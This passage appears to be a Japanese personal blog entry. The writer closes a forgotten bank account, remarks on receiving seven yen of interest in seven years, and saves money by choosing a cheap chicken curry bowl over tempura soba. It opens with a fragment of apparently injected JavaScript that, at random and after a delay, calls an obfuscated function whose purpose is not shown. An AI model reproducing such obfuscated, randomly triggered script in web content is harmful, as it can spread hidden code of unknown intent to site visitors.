andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200712千二百円 惜しんだバカ

10月17日、昔「べじべじ倶楽部」事業用につくった残高五千円の銀行預金解約に銀行へ出かけた。 もう忘れていた預金、久しぶりに祇園の有名そば店」で天ぷらそば(二千円)でも食べようと思っていた。 窓口で貰ったお金は五千七円。平成11年5月からの利息所得は七円、年一円の勘定だ。 年一円のお金を重く感じ「そば代」には使うのは「もったいない」と銀行に来る途中に見た「力餅」のもう一度食べたくなるチキンカレー丼・八百円の看板が浮かんだ。 天麩羅そばより千二百円安いとそれ決めた。 八百円で看板に偽りない味に満足して自転車で「店」戻るべく走った。 節約した成果金四千二百円と七年年月で増えた七円でポケットは重い。
嬉しい気分(?)と下り坂に自然とスピードが上がる